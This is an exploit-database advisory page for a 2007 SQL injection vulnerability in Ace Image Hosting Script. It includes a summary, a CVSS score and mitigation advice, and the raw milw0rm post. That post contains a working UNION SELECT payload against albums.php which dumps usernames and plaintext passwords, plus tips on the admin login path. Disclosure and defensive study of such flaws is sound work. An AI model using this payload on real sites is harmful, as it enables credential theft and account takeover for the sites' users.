Ace Image Hosting Script SQL Injection Vulnerability

vendor:

Ace Image Hosting Script

by:

t0pP8uZz & xprog

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Ace Image Hosting Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Ace Image Hosting Script SQL Injection Vulnerability

The vulnerability allows an attacker to pull user's information from the database by exploiting a SQL injection vulnerability in the Ace Image Hosting Script. By sending a specially crafted request to the albums.php file, an attacker can retrieve user's information including their username and password.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, storing passwords in plaintext should be avoided and instead, a secure hashing algorithm should be used to store passwords securely.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		   Ace Image Hosting Script SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: N/A


DESCRIPTION: 
pull user's info from the database


EXPLOITS:
www.site.com/albums.php?mode=editalbum&id=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(user,char(58),password),3/**/FROM/**/users/**/LIMIT/**/0,1/*


NOTE/TIP:
admin login is at /admin/
passwords are in plaintext
you MUST create a account and login before the injection will work


GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		   Ace Image Hosting Script SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-09]